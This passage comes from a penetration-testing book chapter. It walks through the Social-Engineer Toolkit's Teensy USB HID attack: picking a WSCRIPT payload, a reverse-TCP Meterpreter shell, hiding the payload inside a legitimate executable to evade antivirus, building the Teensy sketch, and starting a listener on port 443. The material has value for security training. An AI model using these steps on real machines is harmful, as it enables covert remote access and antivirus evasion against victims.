Chapter 10
Welcome to the Teensy HID Attack Vector.
Special thanks to: IronGeek and WinFang
1. Powershell HTTP GET MSF Payload
2. WSCRIPT HTTP GET MSF Payload
3. Powershell based Reverse Shell
4. Return to the main menu.
Enter your choice: 2
Do you want to create a payload and listener yes or no: yes
What payload do you want to generate:
Name:                                Description:
. . . SNIP . . .
2. Windows Reverse_TCP Meterpreter   Spawn a meterpreter shell on victim and send back to attacker.
Enter choice (hit enter for default):
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
. . . SNIP . . .
16. Backdoored Executable (BEST)
Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable
[*] PDE file created. You can get it under 'reports/teensy.pde'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
Press enter to continue.
[*] Launching MSF Listener...
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
To begin setting up this attack, choose Teensy USB HID Attack Vector from the main menu, and then choose WSCRIPT HTTP GET MSF Payload. Then tell SET to set up a payload and listener, selecting the default Meterpreter payload and encoding method.